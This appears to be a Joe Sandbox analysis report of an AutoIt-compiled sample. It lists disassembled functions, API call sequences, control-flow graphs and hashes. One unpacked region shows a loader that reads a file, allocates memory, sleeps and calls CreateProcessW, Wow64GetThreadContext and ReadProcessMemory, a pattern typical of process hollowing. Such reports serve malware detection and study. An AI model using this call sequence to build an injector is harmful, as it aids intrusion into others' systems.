                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                        • API String ID: 2673923337-2727554177
                                                                                                                        • Opcode ID: eb921bd1c204578b20d9e3cc6c5759fd33b3ec7ae532ee2631260272f5212f4d
                                                                                                                        • Instruction ID: 32d61e60a20c61d82c7f2955100e1468adcc611afa86308c3233417fe2c76642
                                                                                                                        • Opcode Fuzzy Hash: eb921bd1c204578b20d9e3cc6c5759fd33b3ec7ae532ee2631260272f5212f4d
                                                                                                                        • Instruction Fuzzy Hash: 1A719EB15083019FC324EF25EE8199BB7E8FF89750F40482EF485871A4DB79D948EBA1

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F83A62
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F83A71
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00F83A88
                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00F83A9A
                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00F83AAC
                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F83AD2
                                                                                                                        • RegisterClassExW.USER32(?), ref: 00F83B28
                                                                                                                          • Part of subcall function 00F83041: GetSysColorBrush.USER32(0000000F), ref: 00F83074
                                                                                                                          • Part of subcall function 00F83041: RegisterClassExW.USER32(00000030), ref: 00F8309E
                                                                                                                          • Part of subcall function 00F83041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                                                                                                                          • Part of subcall function 00F83041: InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                                                                                                                          • Part of subcall function 00F83041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                                                                                                                          • Part of subcall function 00F83041: LoadIconW.USER32(000000A9), ref: 00F830F2
                                                                                                                          • Part of subcall function 00F83041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                        • Opcode ID: dc1ea0f23a1aa73be96aea04746c9a39e666aec54040a51088ae446d2b3be6b5
                                                                                                                        • Instruction ID: 07bc5992b77cffea45337afa287f508fd73ccbe8fc34e4f3b7eac6c29b9a3118
                                                                                                                        • Opcode Fuzzy Hash: dc1ea0f23a1aa73be96aea04746c9a39e666aec54040a51088ae446d2b3be6b5
                                                                                                                        • Instruction Fuzzy Hash: D7216DB4D00305BFEB21DFA4EA89B9D7BB4FB09711F000119F584A6294E3BF56449F41

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 767 f83633-f83681 769 f836e1-f836e3 767->769 770 f83683-f83686 767->770 769->770 771 f836e5 769->771 772 f83688-f8368f 770->772 773 f836e7 770->773 774 f836ca-f836d2 DefWindowProcW 771->774 777 f8375d-f83765 PostQuitMessage 772->777 778 f83695-f8369a 772->778 775 f836ed-f836f0 773->775 776 fbd31c-fbd34a call f911d0 call f911f3 773->776 780 f836d8-f836de 774->780 782 f836f2-f836f3 775->782 783 f83715-f8373c SetTimer RegisterWindowMessageW 775->783 811 fbd34f-fbd356 776->811 781 f83711-f83713 777->781 784 fbd38f-fbd3a3 call fe2a16 778->784 785 f836a0-f836a2 778->785 781->780 791 f836f9-f8370c KillTimer call f844cb call f83114 782->791 792 fbd2bf-fbd2c2 782->792 783->781 786 f8373e-f83749 CreatePopupMenu 783->786 784->781 803 fbd3a9 784->803 787 f836a8-f836ad 785->787 788 f83767-f83776 call f84531 785->788 786->781 793 f836b3-f836b8 787->793 794 fbd374-fbd37b 787->794 788->781 791->781 798 fbd2f8-fbd317 MoveWindow 792->798 799 fbd2c4-fbd2c6 792->799 801 f8374b-f8375b call f845df 793->801 802 f836be-f836c4 793->802 794->774 809 fbd381-fbd38a call fd817e 794->809 798->781 806 fbd2c8-fbd2cb 799->806 807 fbd2e7-fbd2f3 SetFocus 799->807 801->781 802->774 802->811 803->774 806->802 812 fbd2d1-fbd2e2 call f911d0 806->812 807->781 809->774 811->774 816 fbd35c-fbd36f call f844cb call f843db 811->816 812->781 816->774
                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00F836D2
                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00F836FC
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F8371F
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F8372A
                                                                                                                        • CreatePopupMenu.USER32 ref: 00F8373E
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00F8375F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                        • String ID: TaskbarCreated
                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                        • Opcode ID: 911632798309a798bcf1b8953b35383133eeae3c3dfdc366c193617d00a079e2
                                                                                                                        • Instruction ID: 5e166381c3bd6659872c6633c4805a70b311ae8d3aab8de88fb598b3cc6006a2
                                                                                                                        • Opcode Fuzzy Hash: 911632798309a798bcf1b8953b35383133eeae3c3dfdc366c193617d00a079e2
                                                                                                                        • Instruction Fuzzy Hash: 634116F2604106BBDB307B68DD89BFD3754F701B10F140629F542C62A6FA6BAE44B762

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                        • API String ID: 1825951767-3513169116
                                                                                                                        • Opcode ID: 640c4e0ffb047665ab32c36ba88b9bb107345493312f7544ed9f152b7a67b078
                                                                                                                        • Instruction ID: 7b3f8eed8488f008675520245a1469269dd2a1fbc492cf2cc91832e00d68c3de
                                                                                                                        • Opcode Fuzzy Hash: 640c4e0ffb047665ab32c36ba88b9bb107345493312f7544ed9f152b7a67b078
                                                                                                                        • Instruction Fuzzy Hash: F0A181B2D14219ABDB14FBA1CC81AEEB778BF15700F040429F452A7191EF799A09EB60

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 942 f52630-f526de call f50000 945 f526e5-f5270b call f53540 CreateFileW 942->945 948 f52712-f52722 945->948 949 f5270d 945->949 954 f52724 948->954 955 f52729-f52743 VirtualAlloc 948->955 950 f5285d-f52861 949->950 952 f528a3-f528a6 950->952 953 f52863-f52867 950->953 956 f528a9-f528b0 952->956 957 f52873-f52877 953->957 958 f52869-f5286c 953->958 954->950 959 f52745 955->959 960 f5274a-f52761 ReadFile 955->960 961 f52905-f5291a 956->961 962 f528b2-f528bd 956->962 963 f52887-f5288b 957->963 964 f52879-f52883 957->964 958->957 959->950 969 f52763 960->969 970 f52768-f527a8 VirtualAlloc 960->970 965 f5291c-f52927 VirtualFree 961->965 966 f5292a-f52932 961->966 971 f528c1-f528cd 962->971 972 f528bf 962->972 967 f5288d-f52897 963->967 968 f5289b 963->968 964->963 965->966 967->968 968->952 969->950 973 f527af-f527ca call f53790 970->973 974 f527aa 970->974 975 f528e1-f528ed 971->975 976 f528cf-f528df 971->976 972->961 982 f527d5-f527df 973->982 974->950 979 f528ef-f528f8 975->979 980 f528fa-f52900 975->980 978 f52903 976->978 978->956 979->978 980->978 983 f527e1-f52810 call f53790 982->983 984 f52812-f52826 call f535a0 982->984 983->982 990 f52828 984->990 991 f5282a-f5282e 984->991 990->950 992 f52830-f52834 CloseHandle 991->992 993 f5283a-f5283e 991->993 992->993 994 f52840-f5284b VirtualFree 993->994 995 f5284e-f52857 993->995 994->995 995->945 995->950
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F52701
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F52927
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036404083.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f50000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFileFreeVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 204039940-0
                                                                                                                        • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                                                        • Instruction ID: 2677b46b324486e6156c6bd44569d158a89813b37e00a8aa2b058fa940e4f203
                                                                                                                        • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                                                        • Instruction Fuzzy Hash: 2CA15B70E00209EBDB54CFE4C894BEEB7B5FF49316F208259EA01BB280D7759A45EB50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1073 f839e7-f83a57 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F83A15
                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83A36
                                                                                                                        • ShowWindow.USER32(00000000,?,?), ref: 00F83A4A
                                                                                                                        • ShowWindow.USER32(00000000,?,?), ref: 00F83A53
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CreateShow
                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                        • Opcode ID: cf3f0a4b4a19ba00a3fbf9135f2663997e514cf63ffe64c3687821099239ca1b
                                                                                                                        • Instruction ID: 6d17026e4cd31400d8caafa0c5075b7d3894b39e0da8b35041bd78fe62525b6b
                                                                                                                        • Opcode Fuzzy Hash: cf3f0a4b4a19ba00a3fbf9135f2663997e514cf63ffe64c3687821099239ca1b
                                                                                                                        • Instruction Fuzzy Hash: 6BF03AB46402907FEA321667AE88E273E7DE7C7F50F00001EB984E2194D2AB0840DBB0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1074 f523b0-f5252d call f50000 call f522a0 CreateFileW 1081 f52534-f52544 1074->1081 1082 f5252f 1074->1082 1085 f52546 1081->1085 1086 f5254b-f52565 VirtualAlloc 1081->1086 1083 f525e7-f525ec 1082->1083 1085->1083 1087 f52567 1086->1087 1088 f52569-f52583 ReadFile 1086->1088 1087->1083 1089 f52585 1088->1089 1090 f52587-f525c1 call f522e0 call f512a0 1088->1090 1089->1083 1095 f525c3-f525d8 call f52330 1090->1095 1096 f525dd-f525e5 ExitProcess 1090->1096 1095->1096 1096->1083
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F522A0: Sleep.KERNELBASE(000001F4), ref: 00F522B1
                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F52520
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036404083.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f50000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFileSleep
                                                                                                                        • String ID: E6S3L4WVZXNWPTAEWG1Q5ZE485JQS
                                                                                                                        • API String ID: 2694422964-3090126132
                                                                                                                        • Opcode ID: fe842130caf3660dbf7cf171d1199d2ee7e81a86e32b7b121521fdfd9d96b822
                                                                                                                        • Instruction ID: a971e752ed8510a0d64e471b8f7970b6a7957297126a8f0516976a5d6c7ff72a
                                                                                                                        • Opcode Fuzzy Hash: fe842130caf3660dbf7cf171d1199d2ee7e81a86e32b7b121521fdfd9d96b822
                                                                                                                        • Instruction Fuzzy Hash: A2719130D14288DAEF11CBB4CC54BEEBB75AF19305F044198E648BB2C1D7BA1B49CB66

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1098 fa564d-fa5666 1099 fa5668-fa566d 1098->1099 1100 fa5683 1098->1100 1099->1100 1101 fa566f-fa5671 1099->1101 1102 fa5685-fa568b 1100->1102 1103 fa568c-fa5691 1101->1103 1104 fa5673-fa5678 call fa8d68 1101->1104 1105 fa569f-fa56a3 1103->1105 1106 fa5693-fa569d 1103->1106 1116 fa567e call fa8ff6 1104->1116 1109 fa56b3-fa56b5 1105->1109 1110 fa56a5-fa56b0 call fa3020 1105->1110 1106->1105 1108 fa56c3-fa56d2 1106->1108 1114 fa56d9 1108->1114 1115 fa56d4-fa56d7 1108->1115 1109->1104 1113 fa56b7-fa56c1 1109->1113 1110->1109 1113->1104 1113->1108 1118 fa56de-fa56e3 1114->1118 1115->1118 1116->1100 1120 fa56e9-fa56f0 1118->1120 1121 fa57cc-fa57cf 1118->1121 1122 fa56f2-fa56fa 1120->1122 1123 fa5731-fa5733 1120->1123 1121->1102 1122->1123 1126 fa56fc 1122->1126 1124 fa579d-fa579e call fb0df7 1123->1124 1125 fa5735-fa5737 1123->1125 1133 fa57a3-fa57a7 1124->1133 1128 fa575b-fa5766 1125->1128 1129 fa5739-fa5741 1125->1129 1130 fa57fa 1126->1130 1131 fa5702-fa5704 1126->1131 1136 fa576a-fa576d 1128->1136 1137 fa5768 1128->1137 1134 fa5743-fa574f 1129->1134 1135 fa5751-fa5755 1129->1135 1132 fa57fe-fa5807 1130->1132 1138 fa570b-fa5710 1131->1138 1139 fa5706-fa5708 1131->1139 1132->1102 1133->1132 1142 fa57a9-fa57ae 1133->1142 1143 fa5757-fa5759 1134->1143 1135->1143 1141 fa57d4-fa57d8 1136->1141 1144 fa576f-fa577b call fa4916 call fb10ab 1136->1144 1137->1136 1140 fa5716-fa572f call fb0f18 1138->1140 1138->1141 1139->1138 1157 fa5792-fa579b 1140->1157 1147 fa57ea-fa57f5 call fa8d68 1141->1147 1148 fa57da-fa57e7 call fa3020 1141->1148 1142->1141 1146 fa57b0-fa57c1 1142->1146 1143->1136 1159 fa5780-fa5785 1144->1159 1152 fa57c4-fa57c6 1146->1152 1147->1116 1148->1147 1152->1120 1152->1121 1157->1152 1160 fa578b-fa578e 1159->1160 1161 fa580c-fa5810 1159->1161 1160->1130 1162 fa5790 1160->1162 1161->1132 1162->1157
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1559183368-0
                                                                                                                        • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                                                                                        • Instruction ID: 782e4bf777c4668492ea2acb89a1107b804a9d087310db7fd1091c46e158aa6b
                                                                                                                        • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                                                                                        • Instruction Fuzzy Hash: 6251C4B1E00B09DFDB248FB9C88066E77B5AF42B30F648729F835A62D0D7749D51AB50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1163 f869ca-f869f1 call f84f3d 1166 fbe45a-fbe46a call fe97e5 1163->1166 1167 f869f7-f86a05 call f84f3d 1163->1167 1170 fbe46f-fbe471 1166->1170 1167->1166 1174 f86a0b-f86a11 1167->1174 1172 fbe473-fbe476 call f84faa 1170->1172 1173 fbe490-fbe4d8 call fa0ff6 1170->1173 1177 fbe47b-fbe48a call fe4534 1172->1177 1184 fbe4da-fbe4e4 1173->1184 1185 fbe4fd 1173->1185 1174->1177 1178 f86a17-f86a39 call f86bec 1174->1178 1177->1173 1187 fbe4f8-fbe4f9 1184->1187 1186 fbe4ff-fbe512 1185->1186 1190 fbe689-fbe69a call fa2f95 call f84faa 1186->1190 1191 fbe518 1186->1191 1188 fbe4fb 1187->1188 1189 fbe4e6-fbe4f5 1187->1189 1188->1186 1189->1187 1200 fbe69c-fbe6ac call f87776 call f85efb 1190->1200 1193 fbe51f-fbe522 call f875e0 1191->1193 1197 fbe527-fbe549 call f85f12 call fe768b 1193->1197 1207 fbe54b-fbe558 1197->1207 1208 fbe55d-fbe567 call fe7675 1197->1208 1216 fbe6b1-fbe6e1 call fdfcb1 call fa106c call fa2f95 call f84faa 1200->1216 1210 fbe650-fbe660 call f8766f 1207->1210 1214 fbe569-fbe57c 1208->1214 1215 fbe581-fbe58b call fe765f 1208->1215 1210->1197 1220 fbe666-fbe670 call f874bd 1210->1220 1214->1210 1224 fbe59f-fbe5a9 call f85f8a 1215->1224 1225 fbe58d-fbe59a 1215->1225 1216->1200 1227 fbe675-fbe683 1220->1227 1224->1210 1233 fbe5af-fbe5c7 call fdfc4d 1224->1233 1225->1210 1227->1190 1227->1193 1238 fbe5ea-fbe5ed 1233->1238 1239 fbe5c9-fbe5e8 call f87f41 call f85a64 1233->1239 1240 fbe61b-fbe61e 1238->1240 1241 fbe5ef-fbe60a call f87f41 call f86999 call f85a64 1238->1241 1262 fbe60b-fbe619 call f85f12 1239->1262 1245 fbe63e-fbe641 call fe7621 1240->1245 1246 fbe620-fbe629 call fdfb6e 1240->1246 1241->1262 1252 fbe646-fbe64f call fa106c 1245->1252 1246->1216 1255 fbe62f-fbe639 call fa106c 1246->1255 1252->1210 1255->1197 1262->1252
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F84F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84F6F
                                                                                                                        • _free.LIBCMT ref: 00FBE68C
                                                                                                                        • _free.LIBCMT ref: 00FBE6D3
                                                                                                                          • Part of subcall function 00F86BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F86D0D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                        • API String ID: 2861923089-1757145024
                                                                                                                        • Opcode ID: 889f6a545f94433ca9a0deb6a0b240c30968a56958f3aaabb518864e38022cd3
                                                                                                                        • Instruction ID: 035818d71384c8b5fecd602127a35b724fe2909d72e8bb6e89be2407b79a62f7
                                                                                                                        • Opcode Fuzzy Hash: 889f6a545f94433ca9a0deb6a0b240c30968a56958f3aaabb518864e38022cd3
                                                                                                                        • Instruction Fuzzy Hash: 6C917A71910219EFCF14EFA5CC919EDB7B5BF19314F14442AF816AB291EB38A904EF60
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F835A1,SwapMouseButtons,00000004,?), ref: 00F835D4
                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F835A1,SwapMouseButtons,00000004,?,?,?,?,00F82754), ref: 00F835F5
                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00F835A1,SwapMouseButtons,00000004,?,?,?,?,00F82754), ref: 00F83617
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                        • Opcode ID: 58f0f0b7e54908b99a741557de8a256e6c08155e91418cb76a294e985c864f1e
                                                                                                                        • Instruction ID: d2d41da5cc5d713ad8a88e72091f381c0c5bd2bfd0570f1d34def8ed8a641992
                                                                                                                        • Opcode Fuzzy Hash: 58f0f0b7e54908b99a741557de8a256e6c08155e91418cb76a294e985c864f1e
                                                                                                                        • Instruction Fuzzy Hash: 30115A71910208BFDB21DF68D844EEEB7B8EF04B50F008459F805D7224E2719F40A760
                                                                                                                        APIs
                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00F51ACD
                                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F51AF1
                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F51B13
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036404083.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f50000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2438371351-0
                                                                                                                        • Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                                                                                                                        • Instruction ID: 9a3f462204c3f4580ed3a01b0c09f03475d4c46815ceacf556578531ff31f6b1
                                                                                                                        • Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                                                                                                                        • Instruction Fuzzy Hash: 0F621D30A14258DBEB24CFA4C841BDEB371FF58301F1091A9D60DEB290E779AE85DB59
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F85045: _fseek.LIBCMT ref: 00F8505D
                                                                                                                          • Part of subcall function 00FE99BE: _wcscmp.LIBCMT ref: 00FE9AAE
                                                                                                                          • Part of subcall function 00FE99BE: _wcscmp.LIBCMT ref: 00FE9AC1
                                                                                                                        • _free.LIBCMT ref: 00FE992C
                                                                                                                        • _free.LIBCMT ref: 00FE9933
